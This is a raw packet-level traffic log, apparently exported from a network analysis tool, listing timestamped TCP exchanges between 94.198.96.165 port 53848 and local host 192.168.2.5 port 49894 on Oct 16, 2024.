                                                                  Oct 16, 2024 13:08:19.944428921 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944441080 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944443941 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.944477081 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.944477081 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.944598913 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944629908 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944641113 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944685936 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.944732904 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944745064 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944753885 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.944789886 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945230007 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945255995 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945266962 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945281982 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945307016 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945399046 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945409060 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945420027 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945430994 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945441961 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945446968 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945452929 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945463896 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945472002 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945481062 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945483923 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945492029 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945503950 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945533037 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945538044 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945543051 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945553064 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945564032 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945586920 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945595980 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945605040 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.945609093 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945619106 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.945667982 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.946258068 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946280003 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946290016 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946337938 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.946337938 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.946403980 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946414948 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946424961 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946435928 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946461916 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.946486950 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:19.946502924 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946542025 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946549892 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:19.946600914 CEST4989453848192.168.2.594.198.96.165
Oct 16, 2024 13:08:19.949775934 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.949816942 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.949826002 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.949836969 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.949889898 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.949923038 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.949934006 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.949944019 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.949955940 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.949976921 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950018883 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950088024 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950098991 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950109005 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950122118 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950133085 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950143099 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950146914 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950154066 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950165033 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950167894 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950184107 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950213909 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950228930 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950239897 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950251102 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950282097 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950305939 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950381041 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950392008 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950402021 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950411081 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950422049 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950433969 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950439930 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950444937 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950448036 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950448036 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950483084 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950505972 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950598955 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950608969 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950618982 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950628996 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950639009 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950644016 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950649023 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950659990 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950670004 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950686932 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950696945 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950700045 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950700045 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950710058 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950722933 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950756073 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.950952053 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950970888 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.950979948 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951005936 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.951031923 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.951061010 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951070070 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951109886 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951119900 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951122999 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.951159954 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.951245070 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951256037 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951267004 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951277018 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951288939 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951298952 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951308966 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951318979 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.951344967 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.951766968 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951777935 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951787949 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951853037 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.951860905 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951921940 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.951977015 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.952120066 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.952151060 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.952161074 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.952225924 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.952263117 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.952274084 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.952284098 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.952296019 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.952323914 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.952349901 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.952390909 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.952402115 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.952411890 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.952423096 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.952431917 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.952447891 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.952474117 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.952474117 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.953615904 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.953691006 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.953701973 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.953718901 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.953751087 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.953751087 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.953783989 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.953954935 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.953964949 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.953974009 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.953984976 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.953994989 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.954005003 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.954014063 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.954015017 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.954070091 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.954070091 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.954233885 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.954296112 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.954305887 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.954346895 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.954488039 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.954499006 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.954509974 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.954541922 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.954570055 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.955504894 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.955527067 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.955535889 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.955611944 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.955651045 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.955662012 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.955672026 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.955723047 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.955739975 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.955749035 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.955800056 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.955890894 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.956016064 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.956037045 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.956046104 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.956099987 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.956124067 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.956135988 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.956151009 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.956192017 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.956199884 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.956222057 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.956232071 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.956271887 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.956307888 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.956316948 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.956326962 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.956396103 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.957842112 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.957854033 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.957865000 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.957907915 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.957946062 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.957957983 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.957967997 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.958005905 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.958034039 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.958045006 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.958055019 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.958087921 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.958201885 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.958245039 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.958254099 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.958338976 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.958401918 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.958493948 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:19.958585978 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:19.966928959 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.172935963 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.172961950 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.173110008 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.174438953 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174568892 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174580097 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174590111 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174602032 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174607038 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174617052 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174628019 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174706936 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174716949 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174777031 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174787045 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174797058 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174807072 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.174807072 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.174843073 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174854040 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174864054 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.174890041 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.174952984 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.175036907 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.175046921 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.175057888 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.175067902 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.175118923 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.175167084 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.175411940 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.175425053 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.175436020 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.175446033 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.175507069 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.175518990 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.175559044 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.175568104 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.175661087 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.178519011 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.178541899 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.178585052 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.178594112 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.178641081 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.178692102 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.178700924 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.178730011 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.178782940 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.178906918 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.178967953 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.178977013 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179052114 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.179064989 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179075003 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179085016 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179095030 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179111004 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179187059 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.179703951 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
